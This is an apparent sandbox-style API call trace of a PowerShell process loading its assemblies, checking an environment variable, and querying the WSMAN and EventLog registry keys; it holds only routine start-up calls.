	[0183.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0183.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.192] VirtualQuery (in: lpAddress=0x17b680, lpBuffer=0x17c540, dwLength=0x30 | out: lpBuffer=0x17c540*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0184.193] VirtualQuery (in: lpAddress=0x17b710, lpBuffer=0x17c5d0, dwLength=0x30 | out: lpBuffer=0x17c5d0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.194] VirtualQuery (in: lpAddress=0x17be90, lpBuffer=0x17cd50, dwLength=0x30 | out: lpBuffer=0x17cd50*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0184.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.196] VirtualQuery (in: lpAddress=0x17be90, lpBuffer=0x17cd50, dwLength=0x30 | out: lpBuffer=0x17cd50*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0184.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0186.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0186.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0186.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0186.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0187.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0187.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0187.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0188.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0188.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0200.689] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.689] CoTaskMemFree (pv=0x42e2b0) 
	[0200.690] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.690] CoTaskMemFree (pv=0x42e2b0) 
	[0200.691] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.692] CoTaskMemFree (pv=0x42e2b0) 
	[0200.693] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.693] CoTaskMemFree (pv=0x42e2b0) 
	[0200.703] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.703] CoTaskMemFree (pv=0x42e2b0) 
	[0200.708] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.708] CoTaskMemFree (pv=0x42e2b0) 
	[0200.709] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0200.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.709] CoTaskMemFree (pv=0x42e2b0) 
	[0200.724] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d658 | out: phkResult=0x17d658*=0x2e4) returned 0x0
	[0200.918] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x17d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x17d55c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d558*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.918] CoTaskMemFree (pv=0x0) 
	[0200.919] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0200.919] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x3e8150, lpcchValueName=0x17d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x17d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.919] CoTaskMemFree (pv=0x3e8150) 
	[0200.919] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0200.919] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x3e8150, lpcchValueName=0x17d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x17d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.919] CoTaskMemFree (pv=0x3e8150) 
	[0200.919] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0200.919] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x3e8150, lpcchValueName=0x17d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x17d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.919] CoTaskMemFree (pv=0x3e8150) 
	[0200.921] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x17d5ec, lpData=0x0, lpcbData=0x17d5e8*=0x0 | out: lpType=0x17d5ec*=0x1, lpData=0x0, lpcbData=0x17d5e8*=0x8) returned 0x0
	[0200.921] CoTaskMemAlloc (cb=0xc) returned 0x1b7c6de0
	[0200.921] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x17d5bc, lpData=0x1b7c6de0, lpcbData=0x17d5b8*=0x8 | out: lpType=0x17d5bc*=0x1, lpData="2.0", lpcbData=0x17d5b8*=0x8) returned 0x0
	[0203.797] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5a8 | out: phkResult=0x17d5a8*=0x1cc) returned 0x0
	[0203.797] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x17d4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x17d4ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d4a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.797] CoTaskMemFree (pv=0x0) 
	[0203.797] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0203.797] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x0, lpValueName=0x3e8150, lpcchValueName=0x17d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x17d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.797] CoTaskMemFree (pv=0x3e8150) 
	[0203.797] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0203.797] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x1, lpValueName=0x3e8150, lpcchValueName=0x17d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x17d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.797] CoTaskMemFree (pv=0x3e8150) 
	[0203.797] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0203.797] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x2, lpValueName=0x3e8150, lpcchValueName=0x17d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x17d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.797] CoTaskMemFree (pv=0x3e8150) 
	[0203.797] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x17d53c, lpData=0x0, lpcbData=0x17d538*=0x0 | out: lpType=0x17d53c*=0x1, lpData=0x0, lpcbData=0x17d538*=0x8) returned 0x0
	[0203.797] CoTaskMemAlloc (cb=0xc) returned 0x1b7c7060
	[0203.797] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x17d50c, lpData=0x1b7c7060, lpcbData=0x17d508*=0x8 | out: lpType=0x17d50c*=0x1, lpData="2.0", lpcbData=0x17d508*=0x8) returned 0x0
	[0203.798] CoTaskMemFree (pv=0x1b7c7060) 
	[0203.799] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0203.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.799] CoTaskMemFree (pv=0x42e2b0) 
	[0204.335] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0204.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.335] CoTaskMemFree (pv=0x42e2b0) 
	[0204.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5d8 | out: phkResult=0x17d5d8*=0x308) returned 0x0
	[0204.347] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x17d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x17d54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.347] CoTaskMemFree (pv=0x0) 
	[0204.348] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.348] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.349] CoTaskMemFree (pv=0x3e8150) 
	[0204.349] CoTaskMemFree (pv=0x0) 
	[0204.349] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
